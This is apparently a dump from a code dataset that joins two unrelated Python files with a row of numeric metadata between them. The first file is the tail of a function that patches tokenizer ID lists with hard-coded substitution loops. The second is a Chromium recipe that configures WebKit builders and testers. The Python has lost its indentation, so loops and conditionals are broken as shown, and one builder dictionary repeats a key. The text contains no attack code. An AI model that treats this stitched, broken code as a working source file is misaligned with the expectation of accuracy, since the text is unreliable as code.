tokenized_augmented_text = tokenized_augmented_text[:index] + [35050] + tokenized_augmented_text[index + 2:]
# Delete a spurious stray 118 when both lists contain the 157 anchor.
while tokenized_text.count(118) < tokenized_augmented_text.count(118) and 157 in tokenized_augmented_text and 157 in tokenized_text:
index = tokenized_augmented_text.index(118)
tokenized_augmented_text = tokenized_augmented_text[:index] + tokenized_augmented_text[index + 1:]
while tokenized_text.count(103) > tokenized_augmented_text.count(103) and 16268 in tokenized_augmented_text:
index = tokenized_augmented_text.index(16268)
tokenized_augmented_text = tokenized_augmented_text[:index] + [103] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(224) > tokenized_augmented_text.count(224) and 16268 in tokenized_augmented_text:
index = tokenized_augmented_text.index(16268)
tokenized_augmented_text = tokenized_augmented_text[:index] + [224] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(116) > tokenized_augmented_text.count(116) and 161 in tokenized_augmented_text:
index = tokenized_augmented_text.index(161)
tokenized_augmented_text = tokenized_augmented_text[:index] + [116] + tokenized_augmented_text[index + 2:]
# From here each loop repairs one specific multi-token retokenization; the
# left/right slice offsets differ per case to match the span widths involved.
while tokenized_augmented_text.count(2238) > tokenized_text.count(2238) and 5488 in tokenized_text and 2364 in tokenized_text:
index = tokenized_augmented_text.index(2238)
tokenized_augmented_text = tokenized_augmented_text[:index-1] + [5488, 572] + tokenized_augmented_text[index + 2:]
while tokenized_augmented_text.count(297) > tokenized_text.count(297) and 1183 in tokenized_text:
index = tokenized_augmented_text.index(297)
tokenized_augmented_text = tokenized_augmented_text[:index] + tokenized_augmented_text[index + 1:]
# while tokenized_augmented_text.count(11934) > tokenized_text.count(11934) and 23129 in tokenized_text and 32775 in tokenized_text:
# index = tokenized_augmented_text.index(11934)
# tokenized_augmented_text = tokenized_augmented_text[:index-2] + [23129, 764] + tokenized_augmented_text[index + 2:]
while tokenized_augmented_text.count(3359) > tokenized_text.count(3359) and 11298 in tokenized_text and 889 in tokenized_text:
index = tokenized_augmented_text.index(3359)
tokenized_augmented_text = tokenized_augmented_text[:index] + [11298, 889] + tokenized_augmented_text[index + 3:]
# while tokenized_augmented_text.count(1158) > tokenized_text.count(1158) and 1083 in tokenized_text and 607 in tokenized_text:
# index = tokenized_augmented_text.index(1158)
# tokenized_augmented_text = tokenized_augmented_text[:index-2] + [607, 1083] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(5872) > tokenized_text.count(5872) and 12453 in tokenized_text and 14864 in tokenized_text:
index = tokenized_augmented_text.index(5872)
tokenized_augmented_text = tokenized_augmented_text[:index-1] + [14864, 12453] + tokenized_augmented_text[index + 2:]
while tokenized_augmented_text.count(6519) > tokenized_text.count(6519) and 12048 in tokenized_text and 896 in tokenized_text:
index = tokenized_augmented_text.index(6519)
tokenized_augmented_text = tokenized_augmented_text[:index-2] + [896, 12048] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(949) > tokenized_text.count(949) and 5664 in tokenized_text and 358 in tokenized_text:
index = tokenized_augmented_text.index(949)
tokenized_augmented_text = tokenized_augmented_text[:index] + [5664, 358] + tokenized_augmented_text[index + 3:]
while tokenized_augmented_text.count(520) > tokenized_text.count(520) and 7402 in tokenized_text and 17738 in tokenized_text:
index = tokenized_augmented_text.index(520)
tokenized_augmented_text = tokenized_augmented_text[:index] + [17738, 7402] + tokenized_augmented_text[index + 4:]
while tokenized_augmented_text.count(14014) > tokenized_text.count(14014) and 3776 in tokenized_text and 5558 in tokenized_text:
index = tokenized_augmented_text.index(14014)
tokenized_augmented_text = tokenized_augmented_text[:index] + [3776, 5558] + tokenized_augmented_text[index + 3:]
while tokenized_augmented_text.count(667) > tokenized_text.count(667) and 20282 in tokenized_text and 3701 in tokenized_text:
index = tokenized_augmented_text.index(667)
tokenized_augmented_text = tokenized_augmented_text[:index] + [3701, 20282] + tokenized_augmented_text[index + 3:]
while tokenized_augmented_text.count(359) > tokenized_text.count(359) and 2171 in tokenized_text and 577 in tokenized_text:
index = tokenized_augmented_text.index(359)
tokenized_augmented_text = tokenized_augmented_text[:index] + [2171, 577] + tokenized_augmented_text[index + 3:]
while tokenized_augmented_text.count(255) > tokenized_text.count(255) and 29690 in tokenized_text:
index = tokenized_augmented_text.index(255)
tokenized_augmented_text = tokenized_augmented_text[:index] + [29690] + tokenized_augmented_text[index + 2:]
while tokenized_augmented_text.count(488) > tokenized_text.count(488) and 1872 in tokenized_text:
index = tokenized_augmented_text.index(488)
tokenized_augmented_text = tokenized_augmented_text[:index] + [16590, 1872] + tokenized_augmented_text[index + 3:]
while tokenized_augmented_text.count(4782) > tokenized_text.count(4782) and 5620 in tokenized_text:
index = tokenized_augmented_text.index(4782)
tokenized_augmented_text = tokenized_augmented_text[:index] + [5620] + tokenized_augmented_text[index + 2:]
while tokenized_augmented_text.count(3897) > tokenized_text.count(3897) and 79 in tokenized_text:
index = tokenized_augmented_text.index(3897)
tokenized_augmented_text = tokenized_augmented_text[:index] + [79, 2913, 7791] + tokenized_augmented_text[index + 4:]
# Guarded loop: only merge 230 with its neighbour when the neighbour really is
# 4210; `break` prevents an infinite loop when it is not.
while tokenized_augmented_text.count(230) > tokenized_text.count(230) and 42062 in tokenized_text:
index = tokenized_augmented_text.index(230)
if tokenized_augmented_text[index + 1] == 4210:
tokenized_augmented_text = tokenized_augmented_text[:index] + [42062] + tokenized_augmented_text[index + 2:]
else:
break
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 42062 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [42062] + tokenized_augmented_text[index + 2:]
while tokenized_augmented_text.count(67) > tokenized_text.count(67) and 1549 in tokenized_text:
index = tokenized_augmented_text.index(67)
tokenized_augmented_text = tokenized_augmented_text[:index-1] + [1549] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(28053) > tokenized_text.count(28053) and 247 in tokenized_text:
index = tokenized_augmented_text.index(28053)
tokenized_augmented_text = tokenized_augmented_text[:index] + [247] + tokenized_augmented_text[index + 2:]
while tokenized_augmented_text.count(28053) > tokenized_text.count(28053) and 564 in tokenized_text:
index = tokenized_augmented_text.index(28053)
tokenized_augmented_text = tokenized_augmented_text[:index] + [564] + tokenized_augmented_text[index + 2:]
# Inverted direction: the augmented list is MISSING occurrences of a target id;
# collapse a 16268-led pair into the missing id.
while tokenized_augmented_text.count(5525) < tokenized_text.count(5525) and 16268 in tokenized_augmented_text:
index = tokenized_augmented_text.index(16268)
tokenized_augmented_text = tokenized_augmented_text[:index] + [5525] + tokenized_augmented_text[index + 2:]
while tokenized_augmented_text.count(164) < tokenized_text.count(164) and 16268 in tokenized_augmented_text:
index = tokenized_augmented_text.index(16268)
tokenized_augmented_text = tokenized_augmented_text[:index] + [164] + tokenized_augmented_text[index + 2:]
while tokenized_augmented_text.count(245) < tokenized_text.count(245) and 16268 in tokenized_augmented_text:
index = tokenized_augmented_text.index(16268)
tokenized_augmented_text = tokenized_augmented_text[:index] + [245] + tokenized_augmented_text[index + 2:]
while tokenized_augmented_text.count(98) > tokenized_text.count(98) and 94 in tokenized_text:
index = tokenized_augmented_text.index(98)
tokenized_augmented_text = tokenized_augmented_text[:index] + [94] + tokenized_augmented_text[index + 2:]
while tokenized_augmented_text.count(102) < tokenized_text.count(102) and 16268 in tokenized_augmented_text:
index = tokenized_augmented_text.index(16268)
tokenized_augmented_text = tokenized_augmented_text[:index] + [102] + tokenized_augmented_text[index + 2:]
# Guarded dedup loops: drop a spurious neighbour id (226 / 220) next to an
# anchor token, breaking out when the neighbour does not match to avoid looping
# forever on the same index.
while tokenized_text.count(226) < tokenized_augmented_text.count(226) and 5323 in tokenized_augmented_text and 5323 in tokenized_text:
index = tokenized_augmented_text.index(5323)
if tokenized_augmented_text[index - 1] == 226:
tokenized_augmented_text = tokenized_augmented_text[:index - 1] + tokenized_augmented_text[index:]
else:
break
while tokenized_text.count(226) < tokenized_augmented_text.count(226) and 2343 in tokenized_augmented_text and 2343 in tokenized_text:
index = tokenized_augmented_text.index(2343)
if tokenized_augmented_text[index + 1] == 226:
tokenized_augmented_text = tokenized_augmented_text[:index + 1] + tokenized_augmented_text[index + 2:]
else:
break
while tokenized_text.count(220) < tokenized_augmented_text.count(220) and 156 in tokenized_augmented_text and 156 in tokenized_text:
index = tokenized_augmented_text.index(156)
if tokenized_augmented_text[index - 1] == 220:
tokenized_augmented_text = tokenized_augmented_text[:index - 1] + tokenized_augmented_text[index:]
else:
break
while tokenized_text.count(297) < tokenized_augmented_text.count(297) and 297 in tokenized_augmented_text and 1183 in tokenized_text:
index = tokenized_augmented_text.index(297)
if tokenized_augmented_text[index - 1] == 705:
tokenized_augmented_text = tokenized_augmented_text[:index - 1] + [1183] + tokenized_augmented_text[index + 1:]
else:
break
# Trailing pair [157, 118]: drop the continuation id when the original ends on
# the bare 157.
if tokenized_augmented_text[-2:] == [157, 118] and tokenized_text[-1] == 157:
tokenized_augmented_text = tokenized_augmented_text[:-1]
# Shuffle-specific repair: when the only difference between the two lists is a
# reversed token span (presumably what find_difference reports as the ids unique
# to each list -- verify), splice the original span back in reversed order.
if len(tokenized_augmented_text) > len(tokenized_text) and augmentation_function == "shuffle_within_sentences_high_pmi":
diff = find_difference(tokenized_text, tokenized_augmented_text)
if tokenizer.decode(diff["in second"]) == tokenizer.decode(diff["in first"][::-1]) and len(diff["in second"]) > 0:
index = tokenized_augmented_text.index(diff["in second"][0])
tokenized_augmented_text = tokenized_augmented_text[:index] + diff["in first"][::-1] + tokenized_augmented_text[index + len(diff["in second"]):]
# Final fix-up: if the original begins with a two-id character (decoding equal
# to merged id 6353) that the augmented list lost entirely, restore the second
# id of that pair at the front.
if len(tokenized_text) > len(tokenized_augmented_text):
if tokenizer.decode(tokenized_text[:2]) == tokenizer.decode(6353) and 6353 not in tokenized_augmented_text:
tokenized_augmented_text = tokenized_text[1:2] + tokenized_augmented_text
return tokenized_augmented_text
| 78.630435
| 194
| 0.704313
| 5,294
| 43,404
| 5.459577
| 0.061012
| 0.277514
| 0.468118
| 0.303602
| 0.843511
| 0.811369
| 0.786216
| 0.727122
| 0.650625
| 0.588347
| 0
| 0.075243
| 0.191019
| 43,404
| 551
| 195
| 78.77314
| 0.7479
| 0.039904
| 0
| 0.250493
| 0
| 0.069034
| 0.025693
| 0.008372
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013807
| false
| 0
| 0
| 0
| 0.033531
| 0.001972
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
90ce9e48d1fec03d4905de1987439f4dfdaee094
| 22,967
|
py
|
Python
|
scripts/slave/recipe_modules/chromium_tests/chromium_webkit.py
|
yjbanov/chromium_build
|
22e3872f14dbf367cd787caa638f3ac948eac7d7
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/slave/recipe_modules/chromium_tests/chromium_webkit.py
|
yjbanov/chromium_build
|
22e3872f14dbf367cd787caa638f3ac948eac7d7
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/slave/recipe_modules/chromium_tests/chromium_webkit.py
|
yjbanov/chromium_build
|
22e3872f14dbf367cd787caa638f3ac948eac7d7
|
[
"BSD-3-Clause"
] | 1
|
2020-07-23T11:05:06.000Z
|
2020-07-23T11:05:06.000Z
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import copy
from . import chromium_chromiumos
from . import steps
# Build this waterfall's spec by starting from the chromium.chromiumos spec
# and retargeting every inherited builder at Blink (tip-of-tree WebKit).
SPEC = copy.deepcopy(chromium_chromiumos.SPEC)
# NOTE: .values() instead of the Python-2-only .itervalues() — identical
# behavior for this mutate-in-place loop, and forward-compatible with Py3.
for b in SPEC['builders'].values():
  b['gclient_apply_config'] = ['blink']
# Archive location and runtest behavior specific to the WebKit waterfall.
SPEC['settings']['build_gs_bucket'] = 'chromium-webkit-archive'
SPEC['settings']['src_side_runtest_py'] = False
SPEC['builders'].update({
'WebKit Win Builder': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 32,
},
'compile_targets': [
# TODO(phajdan.jr): Find a way to automatically add crash_service
# to Windows builds (so that start_crash_service step works).
'crash_service',
],
'bot_type': 'builder',
'testing': {
'platform': 'win',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Win7': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 32,
},
'bot_type': 'tester',
'parent_buildername': 'WebKit Win Builder',
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'win',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Win10': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 32,
},
'bot_type': 'tester',
'parent_buildername': 'WebKit Win Builder',
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'win',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Win x64 Builder': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'compile_targets': [
# TODO(phajdan.jr): Shouldn't be needed once we have 64-bit testers.
'blink_tests',
# TODO(phajdan.jr): Find a way to automatically add crash_service
# to Windows builds (so that start_crash_service step works).
'crash_service',
],
'bot_type': 'builder_tester',
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'testing': {
'platform': 'win',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Win Builder (dbg)': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Debug',
'TARGET_BITS': 32,
},
'compile_targets': [
# TODO(phajdan.jr): Find a way to automatically add crash_service
# to Windows builds (so that start_crash_service step works).
'crash_service',
],
'bot_type': 'builder',
'testing': {
'platform': 'win',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Win7 (dbg)': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Debug',
'TARGET_BITS': 32,
},
'bot_type': 'tester',
'parent_buildername': 'WebKit Win Builder (dbg)',
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'win',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Win x64 Builder (dbg)': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Debug',
'TARGET_BITS': 64,
},
'compile_targets': [
# TODO(phajdan.jr): Shouldn't be needed once we have 64-bit testers.
'blink_tests',
# TODO(phajdan.jr): Find a way to automatically add crash_service
# to Windows builds (so that start_crash_service step works).
'crash_service',
],
'bot_type': 'builder_tester',
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'testing': {
'platform': 'win',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Mac Builder': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'bot_type': 'builder',
'testing': {
'platform': 'mac',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Mac10.6': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'bot_type': 'tester',
'parent_buildername': 'WebKit Mac Builder',
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'mac',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Mac10.7': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'bot_type': 'tester',
'parent_buildername': 'WebKit Mac Builder',
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'mac',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Mac10.8': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'bot_type': 'tester',
'parent_buildername': 'WebKit Mac Builder',
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'mac',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Mac10.9 (retina)': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'compile_targets': [
'blink_tests',
],
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'mac',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Mac10.9': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'bot_type': 'tester',
'parent_buildername': 'WebKit Mac Builder',
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'mac',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Mac10.10': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'bot_type': 'tester',
'parent_buildername': 'WebKit Mac Builder',
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'mac',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Mac Builder (dbg)': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Debug',
'TARGET_BITS': 64,
},
'bot_type': 'builder',
'testing': {
'platform': 'mac',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Mac10.7 (dbg)': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Debug',
'TARGET_BITS': 64,
},
'bot_type': 'tester',
'parent_buildername': 'WebKit Mac Builder (dbg)',
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'mac',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Linux': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb', 'ninja_confirm_noop'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'compile_targets': [
'blink_tests',
],
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'linux',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Linux Trusty': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'compile_targets': [
'blink_tests',
],
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'linux',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Linux 32': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 32,
},
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'linux',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Linux ASAN': {
'chromium_config': 'chromium_clang',
'chromium_apply_config': ['asan', 'mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(extra_args=[
'--additional-expectations',
'src/third_party/WebKit/LayoutTests/ASANExpectations',
# ASAN is roughly 8x slower than Release.
'--time-out-ms', '48000',
'--options=--enable-sanitizer',
]),
],
'testing': {
'platform': 'linux',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Linux MSAN': {
'chromium_config': 'chromium_clang',
'gclient_config': 'chromium',
'chromium_apply_config': [
'mb',
'msan',
'msan_full_origin_tracking',
'prebuilt_instrumented_libraries',
],
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(extra_args=[
'--additional-expectations',
'src/third_party/WebKit/LayoutTests/MSANExpectations',
# Because JS code is run on a simulator, the slowdown in JS-heavy
# tests will be much higher than MSan's average of 3x.
'--time-out-ms', '66000',
'--options=--enable-sanitizer',
]),
],
'testing': {
'platform': 'linux',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Linux (dbg)': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Debug',
'TARGET_BITS': 64,
},
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(),
],
'testing': {
'platform': 'linux',
},
'enable_swarming': True,
'use_isolate': True,
},
'Android Builder': {
'chromium_config': 'android',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['android', 'blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 32,
'TARGET_PLATFORM': 'android',
},
'android_config': 'main_builder',
'bot_type': 'builder',
'testing': {
'platform': 'linux',
},
},
'WebKit Android (Nexus4)': {
'chromium_config': 'android',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['android', 'blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 32,
'TARGET_PLATFORM': 'android',
},
'bot_type': 'tester',
'parent_buildername': 'Android Builder',
'android_config': 'main_builder',
'root_devices': True,
'tests': [
steps.GTestTest('blink_heap_unittests'),
steps.GTestTest('webkit_unit_tests'),
steps.BlinkTest(),
],
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'testing': {
'platform': 'linux',
},
},
'WebKit Win non-Oilpan': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_apply_config': ['oilpan'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 32,
},
'compile_targets': [
# TODO(phajdan.jr): Find a way to automatically add crash_service
# to Windows builds (so that start_crash_service step works).
'crash_service',
],
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(extra_args=[
'--additional-expectations',
'src\\third_party\\WebKit\\LayoutTests\\OilpanExpectations',
]),
],
'testing': {
'platform': 'win',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Win non-Oilpan (dbg)': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb', 'oilpan'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Debug',
'TARGET_BITS': 32,
},
'compile_targets': [
# TODO(phajdan.jr): Find a way to automatically add crash_service
# to Windows builds (so that start_crash_service step works).
'crash_service',
],
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(extra_args=[
'--additional-expectations',
'src\\third_party\\WebKit\\LayoutTests\\OilpanExpectations',
]),
],
'testing': {
'platform': 'win',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Mac non-Oilpan': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb', 'oilpan'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(extra_args=[
'--additional-expectations',
'src/third_party/WebKit/LayoutTests/OilpanExpectations',
]),
],
'testing': {
'platform': 'mac',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Mac non-Oilpan (dbg)': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb', 'oilpan'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Debug',
'TARGET_BITS': 64,
},
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(extra_args=[
'--additional-expectations',
'src/third_party/WebKit/LayoutTests/OilpanExpectations',
]),
],
'testing': {
'platform': 'mac',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Linux non-Oilpan Builder': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb', 'oilpan'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'bot_type': 'builder',
'compile_targets': [
'blink_tests',
],
'testing': {
'platform': 'linux',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Linux non-Oilpan': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb', 'oilpan'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'bot_type': 'tester',
'parent_buildername': 'WebKit Linux non-Oilpan Builder',
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(extra_args=[
'--additional-expectations',
'src/third_party/WebKit/LayoutTests/OilpanExpectations',
]),
],
'testing': {
'platform': 'linux',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Linux non-Oilpan ASAN': {
'chromium_config': 'chromium_clang',
'chromium_apply_config': ['asan', 'mb', 'oilpan'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'compile_targets': [
'blink_tests',
],
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(extra_args=[
'--additional-expectations',
'src/third_party/WebKit/LayoutTests/ASANExpectations',
# ASAN is roughly 8x slower than Release.
'--time-out-ms', '48000',
'--options=--enable-sanitizer',
]),
],
'testing': {
'platform': 'linux',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Linux Leak': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
'BUILD_CONFIG': 'Release',
'TARGET_BITS': 64,
},
'compile_targets': [
'blink_tests',
],
'test_generators': [
steps.generate_gtest,
steps.generate_script,
],
'tests': [
steps.BlinkTest(extra_args=[
'--additional-expectations',
'src/third_party/WebKit/LayoutTests/LeakExpectations',
'--options=--enable-leak-detection',
]),
],
'testing': {
'platform': 'linux',
},
'enable_swarming': True,
'use_isolate': True,
},
'WebKit Linux non-Oilpan Leak': {
'chromium_config': 'chromium',
'chromium_apply_config': ['mb', 'oilpan'],
'gclient_config': 'chromium',
'gclient_apply_config': ['blink_or_chromium'],
'chromium_config_kwargs': {
